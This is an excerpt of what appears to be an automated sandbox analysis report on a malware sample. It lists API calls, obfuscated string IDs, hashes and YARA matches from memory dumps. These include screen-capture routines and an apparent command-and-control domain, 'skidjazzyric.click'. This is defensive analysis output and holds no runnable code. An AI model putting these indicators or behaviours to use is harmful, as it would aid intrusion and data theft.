                                                                                                • Associated: 00000003.00000002.1674712770.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_3B5A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Object$CompatibleCreateMetricsSystem$BitmapCurrentDeleteSelect
                                                                                                • String ID: Y
                                                                                                • API String ID: 1298755333-3233089245
                                                                                                • Opcode ID: c24b2a11f15356cf646cf834205c4c04271eabb57bf08da4818dca27ea7b735a
                                                                                                • Instruction ID: ce6842184c50d62c14bce23637ee5c5f438d7dfa952fd3edf86735d4080956a5
                                                                                                • Opcode Fuzzy Hash: c24b2a11f15356cf646cf834205c4c04271eabb57bf08da4818dca27ea7b735a
                                                                                                • Instruction Fuzzy Hash: 4A81C33A158310EFD7489FB4AC49A3B7BA5FB8A352F050C3CF546D2290C73995168B2B
                                                                                                APIs
                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 004251AA
                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 00425243
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674712770.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1674712770.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_3B5A.jbxd
                                                                                                Similarity
                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                • String ID: +$e$+$e$%\)R$,X*^$.T'j$1D6Z$:@&F$?P:V$C`<f$XY$]RB
                                                                                                • API String ID: 237503144-2846770461
                                                                                                • Opcode ID: be84ad2a2dc8deef5579fea24953012850529ab1ccaeb00d1e318e8ad6242404
                                                                                                • Instruction ID: b6d59b0557f70d7ec2d4011febfa6e18cf4a5b2df19338a98cc8181bc2575411
                                                                                                • Opcode Fuzzy Hash: be84ad2a2dc8deef5579fea24953012850529ab1ccaeb00d1e318e8ad6242404
                                                                                                • Instruction Fuzzy Hash: E7F1EDB4208350DFD310DF69E89166BBBE0FFC5314F54892DE5958B362E7B88906CB46
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674712770.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1674712770.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_3B5A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $@7F$(X#^$+\1R$-T,j$2E1G$4D2Z$8I>K$T`Sf$Wdz$&$$qs$uVw
                                                                                                • API String ID: 0-2419925205
                                                                                                • Opcode ID: b98f95cc8d7a7bfe044da580c8a45b468910242ccf89acd057331744f3faff64
                                                                                                • Instruction ID: c261d025133841230159ca5431fd9423a817dc7e9349410c690f11e8db15d26c
                                                                                                • Opcode Fuzzy Hash: b98f95cc8d7a7bfe044da580c8a45b468910242ccf89acd057331744f3faff64
                                                                                                • Instruction Fuzzy Hash: FA7283B4A05269CFDB24CF55D881BDDBBB2FB46300F1181E9C5496B362DB349A86CF84
                                                                                                APIs
                                                                                                • FreeLibrary.KERNEL32(?), ref: 00419CE7
                                                                                                • FreeLibrary.KERNEL32(?), ref: 00419D24
                                                                                                  • Part of subcall function 004402C0: LdrInitializeThunk.NTDLL(0044316E,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 004402EE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674712770.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1674712770.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_3B5A.jbxd
                                                                                                Similarity
                                                                                                • API ID: FreeLibrary$InitializeThunk
                                                                                                • String ID: ~|$SP$if$pv$tj$vt
                                                                                                • API String ID: 764372645-1422159894
                                                                                                • Opcode ID: 6f3e0809db8a7ee577943ce01a0a1cb86fff2ea56a37afda839586e8e533a568
                                                                                                • Instruction ID: c1c817f51924b2b6e01bbc71c3bfe870e6f9d21007064de5033cd7ab66586395
                                                                                                • Opcode Fuzzy Hash: 6f3e0809db8a7ee577943ce01a0a1cb86fff2ea56a37afda839586e8e533a568
                                                                                                • Instruction Fuzzy Hash: 5D624770609310AFE724CB15DC9176BB7E2EFC5314F18862DF495973A1D378AC858B4A
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_760000_3B5A.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FreeLibrary
                                                                                                • String ID: ~|$SP$if$pv$tj$vt
                                                                                                • API String ID: 3664257935-1422159894
                                                                                                • Opcode ID: 557abf3bdc5e1b4c31fa4c16cb7a998475db0352c266ee35ae4fbd844e0422db
                                                                                                • Instruction ID: f0559e5612a0b1d8eab7ac421a3750f79e25eb60d3c62d338149cef89b81cf7a
                                                                                                • Opcode Fuzzy Hash: 557abf3bdc5e1b4c31fa4c16cb7a998475db0352c266ee35ae4fbd844e0422db
                                                                                                • Instruction Fuzzy Hash: 28620870609350AFEB24CB24CC81B2FB7E2EFC5354F18CA2CE59997291D379AC458B56
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674712770.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1674712770.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_3B5A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 5&'d$O$~
                                                                                                • API String ID: 0-1622812124
                                                                                                • Opcode ID: eb213bdff85b4a2e4d6844bfd16b8efcb37f0a606e6fff5fc883d1a75d116a88
                                                                                                • Instruction ID: 7c8e188e2ff574dc84e1e58bec60109b2722ae2eee07efcef2931a8160e5a92b
                                                                                                • Opcode Fuzzy Hash: eb213bdff85b4a2e4d6844bfd16b8efcb37f0a606e6fff5fc883d1a75d116a88
                                                                                                • Instruction Fuzzy Hash: AC820F7550C3518BC324CF28C8917ABB7E1FF99314F198A6EE4C99B391E7389941CB4A
                                                                                                APIs
                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 004258F4
                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 0042595D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674712770.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1674712770.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_3B5A.jbxd
                                                                                                Similarity
                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                • String ID: B"@$)RSP$=^"\$`J/H$rp
                                                                                                • API String ID: 237503144-816972838
                                                                                                • Opcode ID: bf1cafb989073c4553b17663fd8b05ca961829d4f2cee33832e91d81a2f5237f
                                                                                                • Instruction ID: cd6e5e946c3164ee33c4da05371f075d598195140dbb1deecb8ac0c04a2143aa
                                                                                                • Opcode Fuzzy Hash: bf1cafb989073c4553b17663fd8b05ca961829d4f2cee33832e91d81a2f5237f
                                                                                                • Instruction Fuzzy Hash: 9DA110B6E402188FDB10CFA8DC827EEBBB1FF85314F154169E414AB291D7B59942CB94
                                                                                                APIs
                                                                                                  • Part of subcall function 00436980: GetDC.USER32(00000000), ref: 00436989
                                                                                                  • Part of subcall function 00436980: GetSystemMetrics.USER32(0000004C), ref: 00436999
                                                                                                  • Part of subcall function 00436980: GetSystemMetrics.USER32(0000004D), ref: 004369A1
                                                                                                  • Part of subcall function 00436980: GetCurrentObject.GDI32(00000000,00000007), ref: 004369AA
                                                                                                  • Part of subcall function 00436980: GetObjectW.GDI32(00000000,00000018,?), ref: 004369BA
                                                                                                  • Part of subcall function 00436980: DeleteObject.GDI32(00000000), ref: 004369C1
                                                                                                  • Part of subcall function 00436980: CreateCompatibleDC.GDI32(00000000), ref: 004369D0
                                                                                                  • Part of subcall function 00436980: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004369DB
                                                                                                  • Part of subcall function 00436980: SelectObject.GDI32(00000000,00000000), ref: 004369E7
                                                                                                  • Part of subcall function 00436980: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 00436A0A
                                                                                                • CoUninitialize.OLE32 ref: 0040D555
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674712770.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1674712770.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_3B5A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Object$CompatibleCreateMetricsSystem$BitmapCurrentDeleteSelectUninitialize
                                                                                                • String ID: &W-Q$9Y$?C*]$skidjazzyric.click$|qay$~wxH
                                                                                                • API String ID: 3213364925-1525209810
                                                                                                • Opcode ID: fc5ff244476e8ce422fc6bf60f521c54b7b762fd82f6f5220f24f5c6609ee6f3
                                                                                                • Instruction ID: aef483f231ee1e61a479db6060b0077f9689b526eef662d52e770a901b229f69
                                                                                                • Opcode Fuzzy Hash: fc5ff244476e8ce422fc6bf60f521c54b7b762fd82f6f5220f24f5c6609ee6f3
                                                                                                • Instruction Fuzzy Hash: EEB115756047818BE325CF2AC4D0762BBE2FF96300B18C5ADC4D64BB86D738A806CB95
                                                                                                APIs
                                                                                                  • Part of subcall function 00796BE7: GetDC.USER32(00000000), ref: 00796BF0
                                                                                                  • Part of subcall function 00796BE7: GetCurrentObject.GDI32(00000000,00000007), ref: 00796C11
                                                                                                  • Part of subcall function 00796BE7: GetObjectW.GDI32(00000000,00000018,?), ref: 00796C21
                                                                                                  • Part of subcall function 00796BE7: DeleteObject.GDI32(00000000), ref: 00796C28
                                                                                                  • Part of subcall function 00796BE7: CreateCompatibleDC.GDI32(00000000), ref: 00796C37
                                                                                                  • Part of subcall function 00796BE7: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00796C42
                                                                                                  • Part of subcall function 00796BE7: SelectObject.GDI32(00000000,00000000), ref: 00796C4E
                                                                                                  • Part of subcall function 00796BE7: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 00796C71
                                                                                                • CoUninitialize.COMBASE ref: 0076D7BC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_760000_3B5A.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Object$CompatibleCreate$BitmapCurrentDeleteSelectUninitialize
                                                                                                • String ID: &W-Q$9Y$?C*]$skidjazzyric.click$|qay$~wxH
                                                                                                • API String ID: 3248263802-1525209810
                                                                                                • Opcode ID: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
                                                                                                • Instruction ID: c98a7b4aa533ec7111e36453e631c5bd57366c78d8ad6b3d96bf48991916ebab
                                                                                                • Opcode Fuzzy Hash: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
                                                                                                • Instruction Fuzzy Hash: 82B11675A047818BE725CF2AC4D0762BBE2FF96300B18C1ACD4D64FB46D778A846CB51
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674712770.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1674712770.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_3B5A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: *H%N$+P%V$,X0^$,\/b$2T'Z$4D"J$C`6f$C`6f
                                                                                                • API String ID: 0-102253164
                                                                                                • Opcode ID: 7d18ccd7fb329c2f7a5c3569352263da56546af64857bf12c5cea43640fe8961
                                                                                                • Instruction ID: 7c24634cc790d3dc5544db0222c0a2221dcce8583ae8b0beabc19f11c9a677e2
                                                                                                • Opcode Fuzzy Hash: 7d18ccd7fb329c2f7a5c3569352263da56546af64857bf12c5cea43640fe8961
                                                                                                • Instruction Fuzzy Hash: 923202B19402118BCB24CF24CC927A7B7B2FF95314F28829DD851AF395E779A842CBD5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_760000_3B5A.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: *H%N$+P%V$,X0^$,\/b$2T'Z$4D"J$C`6f$C`6f
                                                                                                • API String ID: 0-102253164
                                                                                                • Opcode ID: f96fe7a7a370e0a426616b44d01145cf498bc23b6eb0afd2ea812e4552abdc14
                                                                                                • Instruction ID: 3362b04f1cd5d6a9e6914c1bf903eb404c20d4c793a55fc07ab52f7797e79c52
                                                                                                • Opcode Fuzzy Hash: f96fe7a7a370e0a426616b44d01145cf498bc23b6eb0afd2ea812e4552abdc14
                                                                                                • Instruction Fuzzy Hash: C43228B19002118BCF25CF24C892776B7B2FF99354F29C29CD845AF795E779A802CB91
                                                                                                APIs
                                                                                                • GetCurrentProcessId.KERNEL32 ref: 00768B0B
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00768B15
                                                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00768BBC
                                                                                                • GetForegroundWindow.USER32 ref: 00768BD1
                                                                                                • ExitProcess.KERNEL32 ref: 00768D1E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_760000_3B5A.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                • String ID: 6W01
                                                                                                • API String ID: 4063528623-326071965
                                                                                                • Opcode ID: bfbdd2f4eb40b0c99f42f083f1dd3dcee64ae0e50d961520efab8e0958816b30
                                                                                                • Instruction ID: af42fe4d65f5b709189a0e31507c335aee269f20a33edff92d6bd1a945123979
                                                                                                • Opcode Fuzzy Hash: bfbdd2f4eb40b0c99f42f083f1dd3dcee64ae0e50d961520efab8e0958816b30
                                                                                                • Instruction Fuzzy Hash: 32519E73B003040BD768AF64DC4A356BA979BC5310F1BC2399D96AB3E6ED788C0587D6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674712770.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1674712770.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_3B5A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 6C(]$?_oY$@w@q$Bc*}$K{Du$`/()$fWpQ
                                                                                                • API String ID: 0-74227037
                                                                                                • Opcode ID: 38d3abca32f2cf0db45db9bcd24ebb0db54af3e6334d844c9839fcbf09972b5b
                                                                                                • Instruction ID: 6cbb9b4a16d706e95eb7c5eb543f19fb0438a443f67131002351f3f2f8f3bf58
                                                                                                • Opcode Fuzzy Hash: 38d3abca32f2cf0db45db9bcd24ebb0db54af3e6334d844c9839fcbf09972b5b
                                                                                                • Instruction Fuzzy Hash: FA1299B5205B01CFD324CF25D891B97BBF6FB45314F058A2DD5AA8BAA0DB74A406CF84
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674712770.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1674712770.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_3B5A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: )RSP$=^"\$B:$C@$K3$bX_^
                                                                                                • API String ID: 0-3030200349
                                                                                                • Opcode ID: b7b7d5e1b28ee3cbee9031abf066d5bdbea60043203f55f78b2bc464f190e4c2
                                                                                                • Instruction ID: 361e1606381cfafdf419846c5dd42b56ab67650ac9a68572a77bc4f7112e5621
                                                                                                • Opcode Fuzzy Hash: b7b7d5e1b28ee3cbee9031abf066d5bdbea60043203f55f78b2bc464f190e4c2
                                                                                                • Instruction Fuzzy Hash: 77B120B6E002288FDB20CF68DC427DEBBB1FB85314F1981A9E418AB351D7785D468F91
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674712770.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1674712770.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_3B5A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0$8<j?$D$4b
                                                                                                • API String ID: 0-1320392364
                                                                                                • Opcode ID: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
                                                                                                • Instruction ID: 2b7b52935a6d5b5a4047c1575b3543403dadbc3efec4758ce9a79863674c7261
                                                                                                • Opcode Fuzzy Hash: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
                                                                                                • Instruction Fuzzy Hash: 9F91F66030C3918BD718CF3A946136BBBD19FD6314F69896EE4D68B391D23CC406871A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_760000_3B5A.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0$8<j?$D$4b
                                                                                                • API String ID: 0-1320392364
                                                                                                • Opcode ID: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
                                                                                                • Instruction ID: ce202ba63552b31d17511c9dc734fdaf34a1264526d41bc5f6b36ae8c9ee3852
                                                                                                • Opcode Fuzzy Hash: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
                                                                                                • Instruction Fuzzy Hash: 7F91E46024C3818BD718DF3988A536AFBD19FD6318F28896EE4D68B292D33DC5099716
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674712770.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1674712770.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_3B5A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 'P0V$,D,J$9HiN$WT
                                                                                                • API String ID: 0-3770969982
                                                                                                • Opcode ID: db0a98afcbfdb664a44cceaff5c849975bf5989fe3d7f245b03da2a88515caab
                                                                                                • Instruction ID: 1a2b24427ca50ea0613cce179253f9256e84f06a3d156f412d4f3691be65671a
                                                                                                • Opcode Fuzzy Hash: db0a98afcbfdb664a44cceaff5c849975bf5989fe3d7f245b03da2a88515caab
                                                                                                • Instruction Fuzzy Hash: 72B123B664D3549BD304CF62D8802AFBBE2FBC1314F098D2DE1C897341D779884A8B86
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_760000_3B5A.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 'P0V$,D,J$9HiN$WT
                                                                                                • API String ID: 0-3770969982
                                                                                                • Opcode ID: 0e2b0cc12e3226d2cd341a2167d348b6fcb24ba631dfe2d9486f098724b9ef4e
                                                                                                • Instruction ID: 105d425e5b98cfc17db7d2a8ee9b4b67aa547aaf736b7a0bba3ff95f4fe5de2c
                                                                                                • Opcode Fuzzy Hash: 0e2b0cc12e3226d2cd341a2167d348b6fcb24ba631dfe2d9486f098724b9ef4e
                                                                                                • Instruction Fuzzy Hash: 6371CFB654D3958BD704DF12C8802AFBBE2FBD1354F188E2CF1D85B252C779854A8B86
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_760000_3B5A.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: B:$C@$K3$bX_^
                                                                                                • API String ID: 0-595269213
                                                                                                • Opcode ID: 0d06cbe45fa1c6c57b514cd4ae27e395b8e4d2b4ab09be3f8917ba205efd2598
                                                                                                • Instruction ID: 2bc8593cce8f2188974a4ee15992d394e139d9c3e48706145b5d2078905d283f
                                                                                                • Opcode Fuzzy Hash: 0d06cbe45fa1c6c57b514cd4ae27e395b8e4d2b4ab09be3f8917ba205efd2598
                                                                                                • Instruction Fuzzy Hash: 6741C0B5D102289BDB20EF79CD867DDBFB1AB85300F4442AAE448A7255D6340E498FD2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674712770.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1674712770.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_3B5A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 8<j?$D$4b
                                                                                                • API String ID: 0-2390459867
                                                                                                • Opcode ID: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
                                                                                                • Instruction ID: 3d775767d977819f4cd04dfa65fb75d6d4b79ad1faca8718d285b39be461a68a
                                                                                                • Opcode Fuzzy Hash: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
                                                                                                • Instruction Fuzzy Hash: 1781F86020C3928BD719CF3A946137BBFD19FD6314F69896EE4D68B381D27DC406871A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674712770.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1674712770.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_3B5A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 8<j?$D$4b
                                                                                                • API String ID: 0-2390459867
                                                                                                • Opcode ID: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
                                                                                                • Instruction ID: e8062cfa3f92b269e517a95a0a15263ae71e3fa69566e020a52e9e5137cfccfc
                                                                                                • Opcode Fuzzy Hash: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
                                                                                                • Instruction Fuzzy Hash: 7281F86030C3928BD718CF3A946136BBBD19FD6314F69896EE4D68B381D27DC406875A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_760000_3B5A.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 8<j?$D$4b
                                                                                                • API String ID: 0-2390459867
                                                                                                • Opcode ID: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
                                                                                                • Instruction ID: 8407974a2d2550433431e09bb40c159e589090eac2a59b06c498baef548dd48d
                                                                                                • Opcode Fuzzy Hash: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
                                                                                                • Instruction Fuzzy Hash: 3081F86024C3818BD719DF3988A137AFBD19FE6314F28896DE4D28B282D33DC50AC716
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_760000_3B5A.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 8<j?$D$4b
                                                                                                • API String ID: 0-2390459867
                                                                                                • Opcode ID: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
                                                                                                • Instruction ID: cb5630a5e2998e2d0b31239169f9d4915f395809419597476efd45e4d10593d0
                                                                                                • Opcode Fuzzy Hash: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
                                                                                                • Instruction Fuzzy Hash: 4381F96024C3818BD719DF3988A537AFBD19FD6314F28896DE4D68B281D37DC50ACB16
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674712770.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1674712770.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_3B5A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: #=0$Z$ut
                                                                                                • API String ID: 0-1971374411
                                                                                                • Opcode ID: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
                                                                                                • Instruction ID: eba545bab416a68370d8833e2e81319f1cd74d48ef4740c2d23370f5f56f4d51
                                                                                                • Opcode Fuzzy Hash: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
                                                                                                • Instruction Fuzzy Hash: 4681E23120C7829AD7058F39845026BBFE1AFA7314F1889AED4D1AB3C7D639C90AC756
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_760000_3B5A.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: #=0$Z$ut
                                                                                                • API String ID: 0-1971374411
                                                                                                • Opcode ID: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
                                                                                                • Instruction ID: ac407ecf80b281bd7227bd448b8299f1d56c2ec5de5d9fa50569f326b94d0263
                                                                                                • Opcode Fuzzy Hash: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
                                                                                                • Instruction Fuzzy Hash: FC81043110C3828AD7058F39C45076BFFE5AFA3318F1899ADD9D29B692D639C90AC752
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674712770.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1674712770.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_3B5A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 8<j?$D$4b
                                                                                                • API String ID: 0-2390459867
                                                                                                • Opcode ID: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
                                                                                                • Instruction ID: b31d7765b50fe5da72acd4eceaa3461b1016088ded1e177ce8b27f3ca53c8b68
